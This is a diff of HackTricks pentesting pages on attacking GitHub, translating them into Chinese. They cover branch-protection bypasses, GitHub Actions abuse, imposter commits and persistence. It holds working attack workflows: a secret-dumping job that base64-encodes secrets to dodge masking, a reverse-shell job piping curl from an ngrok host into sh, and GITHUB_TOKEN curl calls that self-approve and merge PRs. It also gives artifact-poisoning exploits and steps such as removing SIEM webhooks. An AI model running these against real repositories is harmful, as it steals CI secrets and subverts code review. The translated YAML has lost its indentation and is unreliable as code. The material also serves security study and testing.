+有关[**Github应用程序的介绍,请查看基本信息**](basic-github-information.md#github-applications)。
-For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
+攻击者可能创建一个**恶意Github应用程序**,以访问接受它们的用户的特权数据/操作,可能作为网络钓鱼活动的一部分。
-An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+此外,如基本信息中所述,**组织可以授予/拒绝第三方应用程序对与组织相关的信息/仓库/操作的访问**。
-Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+## 破坏与滥用Github Action
-## Compromise & Abuse Github Action
-
-There are several techniques to compromise and abuse a Github Action, check them here:
+有几种技术可以破坏和滥用Github Action,请在此查看:
{{#ref}}
abusing-github-actions/
{{#endref}}
-## Branch Protection Bypass
+## 分支保护绕过
-- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
- - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._
-- **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.
-- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.
- - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.**
-- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.
-- **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections.
-- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.
-- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
-- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
- - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
+- **要求一定数量的批准**:如果您破坏了多个帐户,您可能只需从其他帐户接受您的PR。如果您只有创建PR的帐户,则无法接受自己的PR。但是,如果您可以访问仓库中的**Github Action**环境,使用**GITHUB_TOKEN**,您可能能够**批准您的PR**并以这种方式获得1个批准。
+- _注意,对于此以及代码所有者限制,通常用户无法批准自己的PR,但如果您可以,您可以利用它来接受您的PR。_
+- **在推送新提交时撤销批准**:如果未设置此项,您可以提交合法代码,等待有人批准,然后放入恶意代码并将其合并到受保护的分支中。
+- **要求代码所有者的审查**:如果此项已激活且您是代码所有者,您可以让**Github Action创建您的PR,然后自己批准它**。
+- 当**CODEOWNER文件配置错误**时,Github不会抱怨,但也不会使用它。因此,如果配置错误,**代码所有者保护将不适用。**
+- **允许指定的参与者绕过拉取请求要求**:如果您是这些参与者之一,您可以绕过拉取请求保护。
+- **包括管理员**:如果未设置此项且您是仓库的管理员,您可以绕过此分支保护。
+- **PR劫持**:您可能能够**修改其他人的PR**,添加恶意代码,自己批准结果PR并合并所有内容。
+- **移除分支保护**:如果您是**仓库的管理员,您可以禁用保护**,合并您的PR并重新设置保护。
+- **绕过推送保护**:如果一个仓库**仅允许某些用户**在分支中发送推送(合并代码)(分支保护可能保护所有分支,指定通配符`*`)。
+- 如果您对仓库**具有写入访问权限,但由于分支保护不允许推送代码**,您仍然可以**创建一个新分支**,并在其中创建一个**在代码推送时触发的github action**。由于**分支保护在分支创建之前不会保护该分支**,因此对该分支的第一次代码推送将**执行github action**。
-## Bypass Environments Protections
+## 绕过环境保护
-For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
+有关[**Github环境的介绍,请查看基本信息**](basic-github-information.md#git-environments)。
-In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one).
-
-Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**.
+如果一个环境可以**从所有分支访问**,则**没有保护**,您可以轻松访问环境中的机密。请注意,您可能会发现某些仓库**所有分支都受到保护**(通过指定其名称或使用`*`),在这种情况下,**找到一个可以推送代码的分支**,您可以**通过创建新的github action(或修改一个)来提取**机密。
+请注意,您可能会发现边缘情况,其中**所有分支都受到保护**(通过通配符`*`),并且指定了**谁可以向分支推送代码**(_您可以在分支保护中指定_),而**您的用户不被允许**。您仍然可以运行自定义github action,因为您可以创建一个分支并在其上使用推送触发器。**分支保护允许推送到新分支,因此github action将被触发**。
```yaml
push: # Run it when a push is made to a branch
- branches:
- - current_branch_name #Use '**' to run when a push is made to any branch
+branches:
+- current_branch_name #Use '**' to run when a push is made to any branch
```
+注意,**在创建**分支后,**分支保护将适用于新分支**,您将无法修改它,但在那时您已经提取了秘密。
-Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
+## 持久性
-## Persistence
+- 生成**用户令牌**
+- 从**秘密**中窃取**github令牌**
+- **删除**工作流**结果**和**分支**
+- 给**所有组织**更多权限
+- 创建**webhooks**以提取信息
+- 邀请**外部协作者**
+- **移除****SIEM**使用的**webhooks**
+- 创建/修改带有**后门**的**Github Action**
+- 通过**秘密**值修改查找**易受攻击的Github Action以进行命令注入**
-- Generate **user token**
-- Steal **github tokens** from **secrets**
- - **Deletion** of workflow **results** and **branches**
-- Give **more permissions to all the org**
-- Create **webhooks** to exfiltrate information
-- Invite **outside collaborators**
-- **Remove** **webhooks** used by the **SIEM**
-- Create/modify **Github Action** with a **backdoor**
-- Find **vulnerable Github Action to command injection** via **secret** value modification
+### 冒名顶替提交 - 通过repo提交的后门
-### Imposter Commits - Backdoor via repo commits
-
-In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**.
-
-Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
+在Github中,可以**从一个分叉创建一个PR到一个repo**。即使PR**未被接受**,在原始repo中也会为代码的分叉版本创建一个**提交**id。因此,攻击者**可以固定使用一个来自看似合法的repo的特定提交,该提交并不是由repo的所有者创建的**。
+像[**这个**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
```yaml
name: example
on: [push]
jobs:
- commit:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
- - shell: bash
- run: |
- echo 'hello world!'
+commit:
+runs-on: ubuntu-latest
+steps:
+- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
+- shell: bash
+run: |
+echo 'hello world!'
```
-
-For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
+有关更多信息,请查看 [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
index c5ce0467b..9d030fe12 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
@@ -4,389 +4,371 @@
## Basic Information
-In this page you will find:
+在此页面中,您将找到:
-- A **summary of all the impacts** of an attacker managing to access a Github Action
-- Different ways to **get access to an action**:
- - Having **permissions** to create the action
- - Abusing **pull request** related triggers
- - Abusing **other external access** techniques
- - **Pivoting** from an already compromised repo
-- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts)
+- 攻击者成功访问 Github Action 的所有影响的 **摘要**
+- 不同的 **获取访问权限** 的方式:
+- 拥有 **创建 action** 的 **权限**
+- 滥用与 **pull request** 相关的触发器
+- 滥用 **其他外部访问** 技术
+- 从已被攻陷的仓库进行 **横向移动**
+- 最后,关于 **从内部滥用 action 的后期利用技术** 的一节(导致上述影响)
## Impacts Summary
-For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions).
+有关 [**Github Actions 的基本信息**](../basic-github-information.md#github-actions) 的介绍。
-If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to:
+如果您可以在 **仓库** 中 **执行任意代码**,您可能能够:
-- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP.
-- **Compromise deployments** and other **artifacts**.
- - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
-- **Execute code in custom workers** to abuse computing power and pivot to other systems.
-- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`.
+- **窃取秘密**,并 **滥用管道的权限** 以获得对外部平台(如 AWS 和 GCP)的未授权访问。
+- **破坏部署** 和其他 **工件**。
+- 如果管道部署或存储资产,您可以更改最终产品,从而启用供应链攻击。
+- **在自定义工作节点中执行代码**,以滥用计算能力并横向移动到其他系统。
+- **覆盖仓库代码**,具体取决于与 `GITHUB_TOKEN` 相关的权限。
## GITHUB_TOKEN
-This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option:
+这个 "**秘密**"(来自 `${{ secrets.GITHUB_TOKEN }}` 和 `${{ github.token }}`)是在管理员启用此选项时提供的:
-This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
+此令牌与 **Github 应用程序使用的令牌相同**,因此可以访问相同的端点:[https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
> [!WARNING]
-> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`.
+> Github 应该发布一个 [**流程**](https://github.com/github/roadmap/issues/74),**允许跨仓库** 访问 GitHub,以便一个仓库可以使用 `GITHUB_TOKEN` 访问其他内部仓库。
-You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
+您可以在以下链接查看此令牌的可能 **权限**:[https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
-Note that the token **expires after the job has completed**.\
-These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
+请注意,令牌 **在作业完成后会过期**。\
+这些令牌的格式如下:`ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
-Some interesting things you can do with this token:
+您可以使用此令牌执行的一些有趣操作:
{{#tabs }}
{{#tab name="Merge PR" }}
-
```bash
# Merge PR
curl -X PUT \
- https://api.github.com/repos///pulls//merge \
- -H "Accept: application/vnd.github.v3+json" \
- --header "authorization: Bearer $GITHUB_TOKEN" \
- --header "content-type: application/json" \
- -d "{\"commit_title\":\"commit_title\"}"
+https://api.github.com/repos///pulls//merge \
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header "content-type: application/json" \
+-d "{\"commit_title\":\"commit_title\"}"
```
-
{{#endtab }}
-{{#tab name="Approve PR" }}
-
+{{#tab name="批准 PR" }}
```bash
# Approve a PR
curl -X POST \
- https://api.github.com/repos///pulls//reviews \
- -H "Accept: application/vnd.github.v3+json" \
- --header "authorization: Bearer $GITHUB_TOKEN" \
- --header 'content-type: application/json' \
- -d '{"event":"APPROVE"}'
+https://api.github.com/repos///pulls//reviews \
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header 'content-type: application/json' \
+-d '{"event":"APPROVE"}'
```
-
{{#endtab }}
-{{#tab name="Create PR" }}
-
+{{#tab name="创建 PR" }}
```bash
# Create a PR
curl -X POST \
- -H "Accept: application/vnd.github.v3+json" \
- --header "authorization: Bearer $GITHUB_TOKEN" \
- --header 'content-type: application/json' \
- https://api.github.com/repos///pulls \
- -d '{"head":"","base":"master", "title":"title"}'
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header 'content-type: application/json' \
+https://api.github.com/repos///pulls \
+-d '{"head":"","base":"master", "title":"title"}'
```
-
{{#endtab }}
{{#endtabs }}
> [!CAUTION]
-> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
+> 请注意,在多个情况下,您将能够在 **Github Actions 环境或秘密中找到 github 用户令牌**。这些令牌可能会让您对存储库和组织拥有更多权限。
-List secrets in Github Action output
-
+列出 Github Action 输出中的秘密
```yaml
name: list_env
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - "**"
- push: # Run it when a push is made to a branch
- branches:
- - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
jobs:
- List_env:
- runs-on: ubuntu-latest
- steps:
- - name: List Env
- # Need to base64 encode or github will change the secret value for "***"
- run: sh -c 'env | grep "secret_" | base64 -w0'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+List_env:
+runs-on: ubuntu-latest
+steps:
+- name: List Env
+# Need to base64 encode or github will change the secret value for "***"
+run: sh -c 'env | grep "secret_" | base64 -w0'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-Get reverse shell with secrets
-
+通过秘密获取反向 shell
```yaml
name: revshell
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - "**"
- push: # Run it when a push is made to a branch
- branches:
- - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
jobs:
- create_pull_request:
- runs-on: ubuntu-latest
- steps:
- - name: Get Rev Shell
- run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+create_pull_request:
+runs-on: ubuntu-latest
+steps:
+- name: Get Rev Shell
+run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions:
+可以通过**检查日志**来查看其他用户仓库中Github Token的权限:
-## Allowed Execution
+## 允许的执行
> [!NOTE]
-> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**.
+> 这是妥协Github actions的最简单方法,因为这种情况假设您有**在组织中创建新仓库的权限**,或对**某个仓库具有写权限**。
>
-> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action).
+> 如果您处于这种情况,您可以查看[后期利用技术](./#post-exploitation-techniques-from-inside-an-action)。
-### Execution from Repo Creation
+### 从仓库创建执行
-In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**.
+如果组织的成员可以**创建新仓库**并且您可以执行github actions,您可以**创建一个新仓库并窃取在组织级别设置的秘密**。
-### Execution from a New Branch
+### 从新分支执行
-If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called).
-
-You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be):
+如果您可以**在已经配置了Github Action的仓库中创建新分支**,您可以**修改**它,**上传**内容,然后**从新分支执行该操作**。这样您可以**提取仓库和组织级别的秘密**(但您需要知道它们的名称)。
+您可以在**手动**时使修改后的操作可执行,当**创建PR时**或当**推送某些代码时**(取决于您想要多吵):
```yaml
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - master
- push: # Run it when a push is made to a branch
- branches:
- - current_branch_name
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- master
+push: # Run it when a push is made to a branch
+branches:
+- current_branch_name
# Use '**' instead of a branh name to trigger the action in all the cranches
```
-
---
## Forked Execution
> [!NOTE]
-> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them.
+> 有不同的触发器可以让攻击者**执行另一个仓库的Github Action**。如果这些可触发的操作配置不当,攻击者可能会利用它们。
### `pull_request`
-The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow:
+工作流触发器**`pull_request`**将在每次收到拉取请求时执行工作流,但有一些例外:默认情况下,如果这是您**第一次**进行**协作**,某些**维护者**需要**批准**工作流的**运行**:
> [!NOTE]
-> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**.
+> 由于**默认限制**适用于**首次**贡献者,您可以通过**修复有效的错误/拼写错误**来贡献,然后发送**其他PR以滥用您新的`pull_request`权限**。
>
-> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~
+> **我测试过,这不管用**:~~另一个选项是创建一个与曾经为该项目贡献的人同名的账户,然后删除他的账户。~~
-Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
+此外,默认情况下**防止写权限**和**对目标仓库的秘密访问**,如[**文档**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories)中所述:
-> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**.
+> 除了`GITHUB_TOKEN`,**在从**`forked`**仓库触发工作流时,秘密不会传递给运行器**。在来自**forked repositories**的拉取请求中,**`GITHUB_TOKEN`具有只读权限**。
-An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations.
+攻击者可以修改Github Action的定义,以执行任意操作并附加任意操作。然而,由于上述限制,他将无法窃取秘密或覆盖仓库。
> [!CAUTION]
-> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!**
+> **是的,如果攻击者在PR中更改将被触发的github action,他的Github Action将被使用,而不是源仓库的那个!**
-As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**.
+由于攻击者还控制着被执行的代码,即使在`GITHUB_TOKEN`上没有秘密或写权限,攻击者也可以例如**上传恶意工件**。
### **`pull_request_target`**
-The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission).
+工作流触发器**`pull_request_target`**对目标仓库具有**写权限**和**对秘密的访问**(并且不需要请求权限)。
-Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
-Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
+请注意,工作流触发器**`pull_request_target`**在基础上下文中运行,而不是在PR提供的上下文中(以**不执行不受信任的代码**)。有关`pull_request_target`的更多信息,请[**查看文档**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target)。\
+此外,关于这种特定危险用法的更多信息,请查看这篇[**github博客文章**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)。
-It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**.
+看起来因为**执行的工作流**是定义在**基础**而**不是在PR**中的,所以使用**`pull_request_target`**是**安全的**,但有**一些情况并非如此**。
-An this one will have **access to secrets**.
+而且这个将具有**对秘密的访问**。
### `workflow_run`
-The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`.
-
-In this example, a workflow is configured to run after the separate "Run Tests" workflow completes:
+[**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run)触发器允许在工作流`完成`、`请求`或`进行中`时从不同的工作流运行一个工作流。
+在这个例子中,配置了一个工作流,在单独的“运行测试”工作流完成后运行:
```yaml
on:
- workflow_run:
- workflows: [Run Tests]
- types:
- - completed
+workflow_run:
+workflows: [Run Tests]
+types:
+- completed
```
+此外,根据文档:由 `workflow_run` 事件启动的工作流能够 **访问秘密和写入令牌,即使之前的工作流没有**。
-Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**.
-
-This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\
-The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**.
+这种工作流可能会受到攻击,如果它 **依赖** 于一个可以通过 **`pull_request`** 或 **`pull_request_target`** 被外部用户 **触发** 的 **工作流**。一些脆弱的示例可以在 [**这篇博客中找到**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** 第一个示例是 **`workflow_run`** 触发的工作流下载攻击者的代码:`${{ github.event.pull_request.head.sha }}`\
+第二个示例是 **将** 一个 **工件** 从 **不受信任** 的代码传递到 **`workflow_run`** 工作流,并以使其 **易受 RCE 攻击** 的方式使用该工件的内容。
### `workflow_call`
TODO
-TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR
+TODO:检查从 pull_request 执行时使用/下载的代码是否来自原始或分叉的 PR
-## Abusing Forked Execution
+## 滥用分叉执行
-We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused:
+我们已经提到外部攻击者可以使 GitHub 工作流执行的所有方式,现在让我们看看这些执行如果配置不当,可能会被滥用的情况:
-### Untrusted checkout execution
+### 不受信任的检出执行
-In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request).
+在 **`pull_request`** 的情况下,工作流将在 **PR 的上下文中** 执行(因此它将执行 **恶意 PR 的代码**),但需要有人 **先授权**,并且它将运行时有一些 [限制](./#pull_request)。
-In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**.
+如果工作流使用 **`pull_request_target` 或 `workflow_run`**,并依赖于可以从 **`pull_request_target` 或 `pull_request`** 触发的工作流,则将执行原始仓库中的代码,因此 **攻击者无法控制执行的代码**。
> [!CAUTION]
-> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded):
+> 但是,如果 **action** 有一个 **显式的 PR 检出**,将 **从 PR 获取代码**(而不是从基础),它将使用攻击者控制的代码。例如(检查第 12 行,其中下载了 PR 代码):
-
-The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
+潜在的 **不受信任的代码在 `npm install` 或 `npm build` 期间被运行**,因为构建脚本和引用的 **包由 PR 的作者控制**。
> [!WARNING]
-> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
+> 搜索脆弱 actions 的 GitHub dork 是:`event.pull_request pull_request_target extension:yml`,但是,即使 action 配置不安全,也有不同的方法可以安全地配置要执行的作业(例如,使用关于谁是生成 PR 的参与者的条件)。
-### Context Script Injections
+### 上下文脚本注入
-Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
+请注意,有某些 [**GitHub 上下文**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) 的值是由创建 PR 的 **用户** **控制** 的。如果 GitHub action 使用该 **数据执行任何操作**,可能会导致 **任意代码执行:**
{{#ref}}
gh-actions-context-script-injections.md
{{#endref}}
-### **GITHUB_ENV Script Injection**
+### **GITHUB_ENV 脚本注入**
-From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
+根据文档:您可以通过定义或更新环境变量并将其写入 **`GITHUB_ENV`** 环境文件,使 **环境变量可用于工作流作业中的任何后续步骤**。
-If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**.
+如果攻击者能够 **在此 env 变量中注入任何值**,他可以注入可以在后续步骤中执行代码的 env 变量,例如 **LD_PRELOAD** 或 **NODE_OPTIONS**。
-For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
+例如([**这个**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) 和 [**这个**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)),想象一个工作流,它信任上传的工件将其内容存储在 **`GITHUB_ENV`** env 变量中。攻击者可以上传类似这样的内容来破坏它:
-### Vulnerable Third Party Github Actions
+### 脆弱的第三方 GitHub Actions
#### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact)
-As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories.
+正如在 [**这篇博客文章**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks) 中提到的,这个 GitHub Action 允许访问来自不同工作流甚至仓库的工件。
-The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
-
-Example of vulnerable workflow:
+问题在于,如果 **`path`** 参数未设置,工件将提取到当前目录,并且可能会覆盖后续在工作流中使用或执行的文件。因此,如果工件是脆弱的,攻击者可以利用这一点来破坏其他信任该工件的工作流。
+脆弱工作流的示例:
```yaml
on:
- workflow_run:
- workflows: ["some workflow"]
- types:
- - completed
+workflow_run:
+workflows: ["some workflow"]
+types:
+- completed
jobs:
- success:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@v2
- - name: download artifact
- uses: dawidd6/action-download-artifact
- with:
- workflow: ${{ github.event.workflow_run.workflow_id }}
- name: artifact
- - run: python ./script.py
- with:
- name: artifact
- path: ./script.py
+success:
+runs-on: ubuntu-latest
+steps:
+- uses: actions/checkout@v2
+- name: download artifact
+uses: dawidd6/action-download-artifact
+with:
+workflow: ${{ github.event.workflow_run.workflow_id }}
+name: artifact
+- run: python ./script.py
+with:
+name: artifact
+path: ./script.py
```
-
-This could be attacked with this workflow:
-
+这可以通过以下工作流进行攻击:
```yaml
name: "some workflow"
on: pull_request
jobs:
- upload:
- runs-on: ubuntu-latest
- steps:
- - run: echo "print('exploited')" > ./script.py
- - uses actions/upload-artifact@v2
- with:
- name: artifact
- path: ./script.py
+upload:
+runs-on: ubuntu-latest
+steps:
+- run: echo "print('exploited')" > ./script.py
+- uses actions/upload-artifact@v2
+with:
+name: artifact
+path: ./script.py
```
-
---
-## Other External Access
+## 其他外部访问
-### Deleted Namespace Repo Hijacking
+### 删除的命名空间仓库劫持
-If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted.
